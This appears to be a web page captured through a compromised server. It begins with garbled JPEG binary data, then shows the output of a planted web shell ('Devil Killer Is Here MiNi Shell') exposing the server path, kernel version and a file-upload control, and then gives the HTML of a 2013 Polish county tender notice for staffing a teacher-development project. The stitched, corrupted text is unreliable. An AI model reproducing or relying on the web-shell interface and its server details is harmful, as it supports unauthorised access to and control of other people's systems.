JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131018/218321-N-2013.html

<p class="kh_header"><b>Wałcz: Usługi Koordynatora Projektu, Menadżera Projektu, Asystenta Menadżera Projektu, specjalisty ds. finansowych, Szkolnych Organizatorów Rozwoju Edukacji i Koordynatorów Sieci Współpracy i Samokształcenia w ramach projektu Bezpośrednie wsparcie rozwoju szkół poprzez wdrożenie zmodernizowanego systemu doskonalenia nauczycieli w powiecie wałeckim</b><br>
<b>Numer ogłoszenia: 218321 - 2013; data zamieszczenia: 18.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Wałecki , ul. Dąbrowskiego 17, 78-600 Wałcz, woj. zachodniopomorskie, tel. 67 250 84 51, faks 67 2589010.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiatwalecki.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://www.powiatwalecki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi Koordynatora Projektu, Menadżera Projektu, Asystenta Menadżera Projektu, specjalisty ds. finansowych, Szkolnych Organizatorów Rozwoju Edukacji i Koordynatorów Sieci Współpracy i Samokształcenia w ramach projektu Bezpośrednie wsparcie rozwoju szkół poprzez wdrożenie zmodernizowanego systemu doskonalenia nauczycieli w powiecie wałeckim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi Koordynatora Projektu, Menadżera Projektu, Asystenta Menadżera Projektu, specjalisty ds. finansowych, Szkolnych Organizatorów Rozwoju Edukacji i Koordynatorów Sieci Współpracy i Samokształcenia w ramach projektu Bezpośrednie wsparcie rozwoju szkół poprzez wdrożenie zmodernizowanego systemu doskonalenia nauczycieli w powiecie wałeckim. W ramach Projektu realizowane będą następujące zadania 1)przeprowadzenie pełnego cyklu doskonalenia w każdej szkole przedszkolu w oparciu o dwie oferty doskonalenia na terenie Powiatu Wałeckiego; 2)opracowanie i monitorowanie Powiatowego Programu Wspomagania; 
3)utworzenie czterech tematycznie różnych sieci współpracy i samokształcenia. 
Opis poszczególnych 6 części zamówienia (zamawiający dopuszcza składanie ofert częściowych) Część nr 1. Koordynator Projektu.Obowiązki Koordynatora Projektu obejmują a) realizację Projektu zgodnie z umową o dofinansowanie; b) nadzór nad zgodnością prowadzonych działań z zapisami zawartymi we wniosku aplikacyjnym, w tym budżetem i harmonogramem; c) kierowanie wykonaniem Projektu w formie nadzoru merytorycznego i technicznego (organizacyjnego); d) podejmowanie decyzji operacyjnych, eliminowanie ryzyka nieosiągnięcie założonych celów; e) kierowanie, organizowanie i nadzorowanie pracą Kadry Zarządzającej oraz współpraca z jednostkami biorącymi udział w Projekcie; f) współpracę z opiekunem Projektu z ramienia Instytucji Pośredniczącej II stopnia (IP2 w Warszawie); g) działania informacyjno- promocyjne zgodne z wytycznymi dotyczącymi oznakowania Projektów w ramach POKL; h) dokonywanie kontroli realizacji zadań przewidzianych w Projekcie; 
j) bieżący monitoring postępu rzeczowego i finansowego Projektu, analiza ryzyka i podejmowanie działań mających na celu wyeliminowanie wszelkich nieprawidłowości oraz reagowanie na zagrożenia w trakcie realizacji Projektu; k) przeprowadzenie rekrutacji szkół/przedszkoli, uczestników/uczestniczek sieci współpracy, weryfikacja Formularzy Zgłoszeniowych, wyłonienie Grupy docelowej Projektu zgodnie z Regulaminem realizacji Projektu; o) utrzymywanie kontaktów z IP2 - opracowywanie i przekazywanie IP2 wymaganych dokumentów, informacji i wyjaśnień związanych z realizacją Projektu; p) weryfikowanie i zatwierdzanie dokumentów, które powstały w Projekcie, pod względem merytorycznym; r) nadzór i przeprowadzanie kontroli nad pracą Szkolnych Organizatorów Rozwoju Edukacji; s) nadzór i przeprowadzanie kontroli nad pracą Koordynatorów Sieci Współpracy i Samokształcenia; t) nadzór nad terminowością i prawidłowością opracowania Powiatowego Programu Wspomagania; 
u) dbanie o działania Promocyjne Projektu; w) organizację pracy Biura Projektu; 
z) organizowanie spotkań Kadry Zarządzającej w zakresie zapewnienia sprawnej i prawidłowej realizacji Projektu; aa) organizowanie spotkań z SORE, Koordynatorami Sieci oraz osobą odpowiedzialną za opracowanie PPW; 
bb) przestrzeganie i nadzorowanie przetwarzania danych osobowych w projekcie, zgodnie z ustawą z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz. U. z 2002r. Nr 101, poz. 926 z późn. zm.); Część nr 2. Menadżer Projektu. Obowiązki Menadżera Projektu obejmują: a) zapewnienie zgodności realizacji projektu z zasadami polityk wspólnotowych, z wytycznymi oraz innymi dokumentami, obowiązującymi przy wdrażaniu projektów finansowanych z EFS w ramach PO KL; b) rozliczanie środków w projekcie; c) opracowanie i przygotowanie wniosków o płatność i ostatecznego rozliczenia oraz zamknięcia projektu; d) prowadzenie dokumentacji merytorycznej i finansowej projektu; e) kontrola wewnętrzna przebiegu działań projektowych;
f) przygotowywanie i aktualizacja niezbędnych załączników do umowy o dofinansowanie zgodnie z wymogami IP2 (ORE w Warszawie), w tym w przypadku wprowadzenia zmian we wniosku aplikacyjnym i aneksowania umowy; g) opracowywanie wszystkich wzorów dokumentów niezbędnych do prawidłowej realizacji Projektu oraz oznakowanie ich zgodnie z wytycznymi POKL; h) opracowywanie projektów materiałów promujących realizację Projektu; i) działania informacyjno-promocyjne; j) dokonywanie pomiaru wartości wskaźników oraz produktów Projektu;
k) opracowywanie i przekazywanie IP2 wymaganych dokumentów związanych z realizacją Projektu; l) weryfikacji Formularzy Zgłoszeniowych, Deklaracji Uczestnictwa pod kontem spełniania kryteriów obligatoryjnych i fakultatywnych; m) kontrolę merytoryczną dokumentacji związanej z realizacją Projektu w szkołach/przedszkolach; 
n) przestrzeganie i nadzorowanie przetwarzania danych osobowych w projekcie, zgodnie z ustawą z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz. U. z 2002r. Nr 101, poz. 926 z późn. zm.); o) raportowanie Koordynatorowi  Projektu o przebiegu realizacji Projektu oraz o zagrożeniach mogących mieć wpływ na jego wynik;
p) wykonywanie poleceń Koordynatora Projektu dotyczących prawidłowej realizacji Projektu; r) weryfikowanie i zatwierdzanie dokumentów, które powstały w Projekcie, pod względem merytorycznym; s) nadzór i przeprowadzanie kontroli nad pracą Szkolnych Organizatorów Rozwoju Edukacji; t) nadzór i przeprowadzanie kontroli nad pracą Koordynatorów Sieci Współpracy i Samokształcenia; u) nadzór nad rekrutacją uczestników/uczestniczek procesu doskonalenia w szkołach/przedszkolach; 
w) nadzorowanie bieżących postępów w realizacji Projektu i przygotowywanie wymaganych sprawozdań merytorycznych; v) nadzór i doradztwo w zakresie zgodności realizacji Projektu z aktualnymi wytycznymi i dokumentami obowiązującymi w Projektach EFS-POKL; z) inne zadania wynikające z dokumentów programowych, umów i porozumień, związane z prawidłowym przebiegiem realizacji Projektu; 
aa) zachowanie w tajemnicy wszelkich danych, do których będzie miał dostęp w związku z realizacją zamówienia. Część nr 3. Asystent Menadżera Projektu. Obowiązki Asystenta Menadżera Projektu obejmują: a) prowadzenie spraw administracyjno - biurowych związanych z obsługą Projektu; b) bieżące przekazywanie osobom zaangażowanych w realizacje Projektu ustaleń Koordynatora Projektu; c) sporządzanie protokołów ze spotkań Grupy Zarządzającej; d) prowadzenie i obsługa obiegu korespondencji związanej z Projektem; f) opisywanie pod względem merytorycznym dokumentów związanych z wydatkami Projektu; g) udostępnianie dokumentacji związanej z realizacją Projektu upoważnionym organom kontroli i udzielanie wyjaśnień;
h) gromadzenia dokumentacji dot. monitoringu całego Projektu, i) udostępnianie niezbędnej dokumentacji osobom zaangażowanym w realizację Projektu, j) archiwizowanie dokumentacji Projektu zgodnie z prawem i założeniami PO KL;
k) przekazywanie z odpowiednim wyprzedzeniem informacji na wyznaczony adres e-mail o planowanych zajęciach, warsztatach, kursach itp., l) działania logistyczne - organizacja miejsc spotkań, wykładów, warsztatów, konsultacji, zakupy materiałów biurowych, art. spożywczych na poczęstunki, celem zapewnienia bezkolizyjnej realizacji Projektu; m) wykonywanie poleceń Koordynatora i Menadżera Projektu dotyczących prawidłowej realizacji Projektu; n) przestrzeganie i nadzorowanie przetwarzania danych osobowych w projekcie, zgodnie z ustawą z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz. U. z 2002r. Nr 101, poz. 926 z późn. zm.);
o) inne zadania wynikające z dokumentów programowych, umów i porozumień, związane z prawidłowym przebiegiem realizacji Projektu; p) przeprowadzeniu pomiaru wskaźników realizacji celów (prowadzenie rejestrów, opracowywanie ankiet ewaluacyjnych, monitorowanie obecności uczestników w procesie doskonalenia oraz sieci współpracy i samokształcenia), r) monitorowanie proces rekrutacji i działań promocyjnych, s) zachowanie w tajemnicy wszelkich danych, do których będzie miał dostęp w związku z realizacją zamówienia.Część nr 4. Specjalista ds. finansowych.
Obowiązki specjalisty ds. finansowych  Projektu obejmują: a)finansowa i rachunkowa obsługa Projektu;b) kontrola finansowa dokumentacji związanej z realizacją Projektu w szkołach/przedszkolach; c)  zapewnienie zgodności realizacji projektu z zasadami polityk wspólnotowych, z wytycznymi oraz innymi dokumentami, obowiązującymi przy wdrażaniu projektów finansowanych z EFS w ramach PO KL;d)  zachowanie w tajemnicy wszelkich danych, do których będzie miał dostęp w związku z realizacją zamówienia. e)  wykonywanie poleceń Koordynatora Projektu dotyczących prawidłowej realizacji Projektu; f) weryfikowanie i zatwierdzanie dokumentów, które powstały w Projekcie, pod względem finansowym; Część nr 5. Szkolny Organizator Rozwoju Edukacji. Obowiązki Szkolnych Organizatorów Rozwoju Edukacji obejmują w szczególności a) opracowanie rocznych planów wspomagania doskonalenia zawodowego nauczycieli, realizowanych bezpośrednio w szkołach, ze szczególnym uwzględnieniem: wsparcia dyrektora i nauczycieli w sprecyzowaniu diagnozy faktycznych potrzeb, b) przygotowanie wybranej oferty doskonalenia do realizacji,
c) pomoc w sformułowaniu celów i opracowaniu kompleksowych projektów rozwojowych oraz monitorowaniu ich wdrażania, d) wsparcie szkoły przedszkola w przygotowaniu Rocznego Planu Wspomagania, ściśle odpowiadającego na potrzeby szkoły doskonalenia (przeprowadzenie warsztatu diagnostyczno-rozwojowego),
e) dobór form doskonalenia adekwatnych do potrzeb oraz ich ewaluację,
f) podejmowanie wszelkich działań związanych z realizacją w szkole konkretnej oferty (spotkania, konsultacje zbiorowe i indywidualne, w miarę potrzeby organizowanie spotkań i konsultacji z ekspertami - specjalistami w wybranym obszarze doskonalenia),
g) utrzymywanie stałego kontaktu z dyrektorem i nauczycielami, h)  wsparcie przy zapewnianiu obiegu informacji (stały kontakt z osobami zaangażowanymi w realizację RPW, dbanie o przepływ informacji dotyczących działań podejmowanych w ramach jego współpracy ze szkołą/przedszkolem), i) opracowanie wymagań na ekspertów zewnętrznych, j) stała współpraca z ekspertami zewnętrznym oraz ustalenie z ekspertami i pracownikami biura projektu zmian w programie warsztatów,
k) opracowanie przy współpracy z ekspertami wzoru kwestionariusza kompetencji, który będzie wypełniany dla każdego uczestnika, l) organizowanie zaplanowanych form wspomagania (w tym sale, catering, materiały biurowe) we współpracy z biurem projektu, m) monitorowanie przebiegu realizacji rocznego planu wspomagania, reagowanie na pojawiające się trudności, n) dokumentowanie podejmowanych działań - miesięczne sprawozdania dostarczane do biura projektu najpóźniej do 10 dnia następnego miesiąca o) w zależności od potrzeb wsparcie w trakcie organizowanych warsztatów - uczestnictwo w spotkaniach p) przygotowanie sprawozdań z przebiegu realizacji Rocznego Planu Wspomagania, r) wykonywanie poleceń Koordynatora i Menadżera Projektu dotyczących prawidłowej realizacji Projektu;
s) nadzorowanie bieżących postępów w realizacji Projektu i przygotowywanie wymaganych sprawozdań merytorycznych; t) przeprowadzeniu pomiaru wskaźników realizacji celów (prowadzenie rejestrów, opracowywanie ankiet ewaluacyjnych, monitorowanie obecności uczestników w procesie doskonalenia); u) rekrutacja uczestników/uczestniczek procesu doskonalenia w szkołach/przedszkolach;
v) raportowanie Koordynatorowi  i Menażerowi Projektu o przebiegu realizacji Projektu oraz o zagrożeniach mogących mieć wpływ na jego wynik; Część nr 6. Koordynator Sieci Współpracy i Samokształcenia. Obowiązki Koordynatorów Sieci Współpracy i Samokształcenia  obejmują w szczególności a) opracowanie rocznych planów pracy sieci współpracy sieci i samokształcenia, ze szczególnym uwzględnieniem wsparcia dyrektora i nauczycieli w sprecyzowaniu diagnozy faktycznych potrzeb, 
b) przygotowanie wybranej sieci, c) pomoc w sformułowaniu celów i opracowaniu kompleksowych projektów rozwojowych oraz monitorowaniu ich wdrażania,
d) dobór form doskonalenia adekwatnych do potrzeb oraz ich ewaluację,
e) podejmowanie wszelkich działań związanych z realizacją pracy sieci
f) utrzymywanie stałego kontaktu z dyrektorem i nauczycielami, g) wsparcie przy zapewnianiu obiegu informacji (stały kontakt z osobami zaangażowanymi w realizację RPW, dbanie o przepływ informacji dotyczących działań podejmowanych w ramach jego współpracy ze szkołą/przedszkolem), h) opracowanie wymagań na ekspertów zewnętrznych, i) stała współpraca z ekspertami zewnętrznymi oraz ustalenie z ekspertami i pracownikami biura projektu zmian w programie warsztatów, j) opracowanie przy współpracy z ekspertami wzoru kwestionariusza kompetencji, który będzie wypełniany dla każdego uczestnika,k) organizowanie zaplanowanych form wspomagania (w tym sale, catering, materiały biurowe) we współpracy z biurem projektu, l) monitorowanie przebiegu realizacji rocznego planu pracy sieci, reagowanie na pojawiające się trudności, m) dokumentowanie podejmowanych działań - miesięczne sprawozdania dostarczane do biura projektu najpóźniej do 10 dnia następnego miesiąca n) w zależności od potrzeb wsparcie w trakcie organizowanych warsztatów - uczestnictwo w spotkaniach o) przygotowanie sprawozdań z przebiegu realizacji pracy sieci, r) wykonywanie poleceń Koordynatora i Menadżera Projektu dotyczących prawidłowej realizacji Projektu; s) nadzorowanie bieżących postępów w realizacji Projektu i przygotowywanie wymaganych sprawozdań merytorycznych;
t) przeprowadzeniu pomiaru wskaźników realizacji celów (prowadzenie rejestrów, opracowywanie ankiet ewaluacyjnych, monitorowanie obecności uczestników w procesie doskonalenia); u) rekrutacja uczestników/uczestniczek sieci współpracy i samokształcenia  w szkołach przedszkolach; v) raportowanie Koordynatorowi  i Menażerowi Projektu o przebiegu realizacji Projektu oraz o zagrożeniach mogących mieć wpływ na jego wynik; w)  organizacja spotkań nauczycieli uczestniczących w sieci i prowadzenie rzeczonych spotkań w zakresie merytorycznym, z) moderowanie forum dyskusyjnego na platformie cyfrowej, aa) przygotowywanie zamieszczanie na platformie cyfrowej materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieci, bb) sporządzenie rocznego sprawozdania z pracy sieci i przedstawienie go uczestnikom, cc) promocja działań sieci,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 79.42.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował, co najmniej w zakresie części nr 1 (Koordynator Projektu) jedną osobą, która będzie pełnić funkcję Koordynatora Projektu, posiadającą uprawnienia nauczyciela dyplomowanego, studia wyższe II stopnia z zakresu kierowania oświatą, co najmniej 10 letnie doświadczenie w pracy nauczyciela lub pedagoga, znajomość środowiska edukacyjnego, umiejętności z zakresu moderowania grupy, co najmniej 10 letnie doświadczenie w prowadzeniu różnych form pracy z grupami osób dorosłych, znajomość założeń projektu Ośrodka Rozwoju Edukacji System doskonalenia nauczycieli oparty na ogólnodostępnym kompleksowym wspomaganiu szkół i znajomość zasad konkursu 1POKL3.52012 w ramach EFS Programy kompleksowego wspomagania szkół oraz przedszkoli, podporządkowane potrzebom ww. podmiotów w obszarach wymagających szczególnego wsparcia dla którego Instytucją Pośredniczącą II stopnia jest Ośrodek Rozwoju Edukacji; w zakresie części nr 2 (Menadżer Projektu) jedną osobą, która będzie pełnić funkcję Menedżera Projektu, posiadającą studia wyższe II stopnia, umiejętność pracy w Generatorze Wniosków Aplikacyjnych i Wniosków o Płatność, umiejętność pracy w Podsystemie PEFS, co najmniej roczne doświadczenie w pracy na podobnym stanowisku, co najmniej roczne doświadczenie w realizacji projektów współfinansowanych ze środków Unii Europejskiej, znajomość założeń projektu Ośrodka Rozwoju Edukacji System doskonalenia nauczycieli oparty na ogólnodostępnym kompleksowym wspomaganiu szkół i znajomość zasad konkursu 1POKL3.52012 w ramach EFS Programy kompleksowego wspomagania szkół oraz przedszkoli, podporządkowane potrzebom ww. podmiotów w obszarach wymagających szczególnego wsparcia dla którego Instytucją Pośredniczącą II stopnia jest Ośrodek Rozwoju Edukacji; w zakresie części nr 3 (Asystent Menadżera Projektu): jedną osobą, która będzie pełnić funkcję Asystenta Menedżera Projektu, posiadającą wykształcenie co najmniej średnie, co najmniej roczne doświadczenie w pracy na podobnym stanowisku, co najmniej roczne doświadczenie w realizacji projektów  współfinansowanych ze środków Unii Europejskiej, umiejętność pracy w Generatorze Wniosków Aplikacyjnych i Wniosków o Płatność, umiejętność pracy w Podsystemie PEFS; w zakresie części nr 4 (Specjalista ds. finansowych) jedną osobą, która będzie pełnić funkcję Specjalista ds. finansowych, posiadającą studia wyższe II stopnia w zakresie finansów i rachunkowości, co najmniej roczne doświadczenie w realizacji projektów współfinansowanych ze środków Unii Europejskiej; w zakresie części nr 5 (Szkolny Organizator Rozwoju Edukacji) jedną osobą, która będzie pełnić funkcję Szkolny Organizator Rozwoju Edukacji, posiadającą studia wyższe II stopnia z przygotowaniem pedagogicznym, certyfikat SORE, co najmniej 5 letni staż pracy w szkolnictwie (w charakterze nauczyciela lub pedagoga lub psychologa w placówce oświatowej), umiejętność konstruowania narzędzi badawczych oraz doświadczenie w prowadzeniu badań diagnostycznych, doświadczenie w koordynowaniu pracy zespołowej, biegłe posługiwanie się technologią informacyjną i komunikacyjną, znajomość założeń projektu Ośrodka Rozwoju Edukacji System doskonalenia nauczycieli oparty na ogólnodostępnym kompleksowym wspomaganiu szkół i znajomość zasad konkursu 1POKL3.52012 w ramach EFS Programy kompleksowego wspomagania szkół oraz przedszkoli, podporządkowane potrzebom ww. podmiotów w obszarach wymagających szczególnego wsparcia dla którego Instytucją Pośredniczącą II stopnia jest Ośrodek Rozwoju Edukacji w zakresie części nr 6 (Koordynator Sieci Współpracy i Samokształcenia): jedną osobą, która będzie pełnić funkcję Koordynator Sieci Współpracy i Samokształcenia, posiadającą studia wyższe II stopnia lub studia podyplomowe i wiedza merytoryczna z zakresu tematyki sieci, co najmniej 5 letni staż pracy w szkolnictwie (w charakterze nauczyciela lub pedagoga lub psychologa w placówce oświatowej), uprawnienia pedagogiczne, znajomość środowiska edukacyjnego, umiejętności z zakresu moderowania grupy, doświadczenie w prowadzeniu różnych form pracy z grupami osób dorosłych, doświadczenie w pracy z wykorzystaniem narzędzi informatycznych, znajomość założeń projektu Ośrodka Rozwoju Edukacji System doskonalenia nauczycieli oparty na ogólnodostępnym kompleksowym wspomaganiu szkół i znajomość zasad konkursu 1 POKL 3.5 2012 w ramach EFS Programy kompleksowego wspomagania szkół oraz przedszkoli, podporządkowane potrzebom ww. podmiotów w obszarach wymagających szczególnego wsparcia dla którego Instytucją Pośredniczącą II stopnia jest Ośrodek Rozwoju Edukacji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiatwalecki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Wałczu, ul. Dąbrowskiego 17, 78 - 600 Wałcz, pokój 301.</p>
